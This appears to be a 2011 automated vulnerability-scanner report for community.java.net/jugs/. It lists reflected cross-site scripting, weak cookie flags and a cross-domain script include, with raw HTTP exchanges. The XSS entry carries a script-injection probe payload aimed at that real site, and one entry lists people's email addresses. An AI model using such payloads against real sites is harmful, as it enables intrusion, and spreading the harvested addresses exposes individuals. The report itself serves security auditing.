1. Cross-site scripting (reflected)
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
4. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://community.java.net |
Path: | /jugs/ |
GET /jugs/?d9096"><script>alert(1)< Host: community.java.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 06 Mar 2011 14:41:57 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Set-Cookie: SESSe2db433431725a35 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 06 Mar 2011 14:41:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32093 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ...[SNIP]... <a href="https://java.net ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://community.java.net |
Path: | /jugs/ |
GET /jugs/ HTTP/1.1 Host: community.java.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 06 Mar 2011 14:41:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Set-Cookie: SESSe2db433431725a35 Last-Modified: Sun, 06 Mar 2011 14:41:50 GMT ETag: "d5a7a16b02961aa9465 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32001 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://community.java.net |
Path: | /jugs/ |
GET /jugs/ HTTP/1.1 Host: community.java.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 06 Mar 2011 14:41:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Set-Cookie: SESSe2db433431725a35 Last-Modified: Sun, 06 Mar 2011 14:41:50 GMT ETag: "d5a7a16b02961aa9465 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32001 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.java.net |
Path: | /jugs/ |
GET /jugs/ HTTP/1.1 Host: community.java.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 06 Mar 2011 14:41:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Set-Cookie: SESSe2db433431725a35 Last-Modified: Sun, 06 Mar 2011 14:41:50 GMT ETag: "d5a7a16b02961aa9465 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32001 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ...[SNIP]... <!-- Begin Web-Stat code 2.0 http --> <script type="text/javascript" src="http://server4.web </script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.java.net |
Path: | /jugs/ |
GET /jugs/ HTTP/1.1 Host: community.java.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 06 Mar 2011 14:41:51 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.5 Set-Cookie: SESSe2db433431725a35 Last-Modified: Sun, 06 Mar 2011 14:41:50 GMT ETag: "d5a7a16b02961aa9465 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32001 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ...[SNIP]... <a href="mailto:bruno@javaman.com.br">bruno@javaman.com.br</a> ...[SNIP]... <a href="mailto:johnyeary@gmail.com">johnyeary@gmail.com</a> ...[SNIP]... <a href="mailto:fabrizio@gianneschi.it">fabrizio@gianneschi.it</a> ...[SNIP]... <a href="mailto:michael@huettermann.net">michael@huettermann.net</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.java.net |
Path: | /jugs/ |
GET /robots.txt HTTP/1.0 Host: community.java.net |
HTTP/1.1 200 OK Date: Sun, 06 Mar 2011 14:41:52 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Sat, 26 Feb 2011 11:51:12 GMT ETag: "c2e417-673-49d2e1028ac00 Accept-Ranges: bytes Content-Length: 1651 Cache-Control: max-age=1209600 Expires: Sun, 20 Mar 2011 14:41:52 GMT Connection: close Content-Type: text/plain; charset=UTF-8 # $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $ # # robots.txt # # This file is to prevent the crawling and indexing of certain parts # of your site by web crawlers and spiders run by ...[SNIP]... |